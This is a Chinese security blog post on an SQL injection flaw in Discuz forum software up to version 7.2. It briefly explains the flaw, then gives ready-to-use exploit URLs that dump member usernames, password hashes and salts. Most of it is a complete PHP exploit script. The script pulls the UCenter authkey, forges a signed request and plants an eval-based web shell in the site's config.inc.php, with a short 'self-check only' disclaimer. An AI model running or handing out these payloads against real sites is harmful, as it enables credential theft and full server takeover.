Discuz <= 7.2 SQL未公开注入漏洞
- 发表于
- Vulndb
据说是某数字公司的应急给发布出来了.群里面的小伙伴都惊呆了
具体的漏洞分析看:http://www.80vul.com/webzine_0x06/PSTZine_0x06_0x03.txt
其中的
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 |
在《高级PHP应用程序漏洞审核技术》[1]一文里的"魔术引号带来的新的安全问题"一节里,有 提到通过提取魔术引号产生的“\”字符带来的安全问题,同样这个问题在这里又一次完美体 现,如下面的代码片段: // foo.php?xigr='ryat function daddslashes($string, $force = 0) { !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); if(!MAGIC_QUOTES_GPC || $force) { if(is_array($string)) { foreach($string as $key => $val) { $string[$key] = daddslashes($val, $force); } } else { $string = addslashes($string); } } return $string; } ... foreach(array('_COOKIE', '_POST', '_GET') as $_request) { foreach($$_request as $_key => $_value) { $_key{0} != '_' && $$_key = daddslashes($_value); } } echo $xigr['hi']; // echo \ 上面的代码原本期望得到一个经过daddslashes()安全处理后的数组变量$xigr['hi'],但是没 有对变量$xigr做严格的类型规定,当我们提交一个字符串变量$xigr='ryat,经过上面的处理 变为\'ryat,到最后$xigr['hi']就会输出\,如果这个变量引入到SQL语句,那么就会引起严重 的安全问题了,再来看下面的代码片段: ... if($xigr) { foreach($xigr as $k => $v) { $uids[] = $v['uid']; } $query = $db->query("SELECT uid FROM users WHERE uid IN ('".implode("','", $uids)."')"); 利用上面提到的思路,通过提交foo.php?xigr[]='&xigr[][uid]=evilcode这样的构造形式可 以很容易的突破GPC或类似的安全处理,形成SQL注射漏洞:D |
测试漏洞存在的语句
exp:
|
1 |
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 |
爆出账号+密码+salt的语句
|
1 |
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 |
以下内容仅供站长进行安全自检,非法利用责任自负
附上getshell exp:(根据别人的测试,代码可能有些部分有待完善)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 |
<?php /** * @author: xiaoma * @blog : www.i0day.com * @date : 2014.7.2 23:1 */ error_reporting(0); set_time_limit(3000); $host=$argv[1]; $path=$argv[2]; $js=$argv[3]; $timestamp = time()+10*3600; $table="cdb_";//表名 if ($argc < 2) { print_r(' ******************************************************** * Discuz faq.php SQL Injection Exp * * ---------By:Www.i0day.com----------- * * Usage: php '.$argv[0].' url [js] * * ------------------------------------- * * js选项: 1.GetShell 2.取密码 3.查表前缀 * * * * php '.$argv[0].' Www.i0day.com / 1 * * php '.$argv[0].' Www.i0day.com /dz72/ 1 * * * * * ******************************************************** '); exit; } if($js==1){ $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20".$table."uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23"; $resp = sendpack($host,$path,$sql); if(strpos($resp,"::")==-1){ echo '表前缀可能不是默认cdb_ 请先查看表前缀!'; }else{ preg_match("/::(.*)::/",$resp,$matches); $lenght=intval($matches[1]); if($lenght){ if($lenght<=124){ $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23"; $resp = sendpack($host,$path,$sql); if(strpos($resp,"1\^")!=-1){ preg_match("/1\^(.*)\'/U",$resp,$key1); $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20".$table."uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23"; $resp = sendpack($host,$path,$sql); preg_match("/1\^(.*)\'/U",$resp,$key2); $key=$key1[1].$key2[1]; $code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $key)); $cmd1='<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">bbs.49you.com\');eval($_POST[i0day]);//</item> </root>'; $cmd2='<?xml version="1.0" encoding="ISO-8859-1"?> <root> <item id="UC_API">bbs.49you.com</item> </root>'; $html1 = send($cmd1); $res1=substr($html1,-1); $html2 = send($cmd2); $res2=substr($html1,-1); if($res1=='1'&&$res2=='1'){ echo "shell地址:http://".$host.$path.'config.inc.php pass:i0day'; } }else{ echo '获取失败'; } } } } }elseif($js==2){ $sql="action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20".$table."uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23"; $resp = sendpack($host,$path,$sql); if(strpos($resp,"\^\^\^")!=-1){ preg_match("/\^\^\^(.*)\^/U",$resp,$password); echo '密码:'.$password[1]; }else{ echo '表前缀可能不是默认cdb_ 请先查看表前缀!'; } }elseif($js==3){ $sql="action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23"; $resp = sendpack($host,$path,$sql); if(strpos($resp,"1\^")!=-1){ preg_match("/1\^(.*)\^/U",$resp,$t); if(strpos($t[1],"cdb_")!=-1){ echo "表名为:".hex2str($t[1])." 表前缀为默认cdb_ 无需修改"; }else{ echo "表名:".hex2str($t[1]).' 不是默认表名cdb_请自行修改代码中的$table'; } }else{ echo "查看表前缀失败,Sorry"; } }else{ echo "未选择脚本功能"; } function sendpack($host,$path,$sql,$js){ $data = "GET ".$path."/faq.php?".$sql." HTTP/1.1\r\n"; $data.="Host:".$host."\r\n"; $data.="User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n"; $data.="Connection: close\r\n\r\n"; //$data.=$html."\r\n"; $ock=fsockopen($host,80); if(!$ock){ echo "No response from ".$host; die(); } fwrite($ock,$data); $resp = ''; while (!feof($ock)) { $resp.=fread($ock, 1024); } return $resp; } function send($cmd){ global $host,$code,$path; $message = "POST ".$path."/api/uc.php?code=".$code." HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Referer: ".$host."\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "Host: ".$host."\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; //var_dump($message); $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) { $ckey_length = 4; $key = md5($key ? $key : UC_KEY); $keya = md5(substr($key, 0, 16)); $keyb = md5(substr($key, 16, 16)); $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; $cryptkey = $keya.md5($keya.$keyc); $key_length = strlen($cryptkey); $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; $string_length = strlen($string); $result = ''; $box = range(0, 255); $rndkey = array(); for($i = 0; $i <= 255; $i++) { $rndkey[$i] = ord($cryptkey[$i % $key_length]); } for($j = $i = 0; $i < 256; $i++) { $j = ($j + $box[$i] + $rndkey[$i]) % 256; $tmp = $box[$i]; $box[$i] = $box[$j]; $box[$j] = $tmp; } for($a = $j = $i = 0; $i < $string_length; $i++) { $a = ($a + 1) % 256; $j = ($j + $box[$a]) % 256; $tmp = $box[$a]; $box[$a] = $box[$j]; $box[$j] = $tmp; $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); } if($operation == 'DECODE') { if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { return substr($result, 26); } else { return ''; } } else { return $keyc.str_replace('=', '', base64_encode($result)); } } function hex2str($hex){ $str = ''; $arr = str_split($hex, 2); foreach($arr as $bit){ $str .= chr(hexdec($bit)); } return $str; } ?> |
原文连接:Discuz <= 7.2 SQL未公开注入漏洞
所有媒体,可在保留署名、
原文连接的情况下转载,若非则不得使用我方内容。
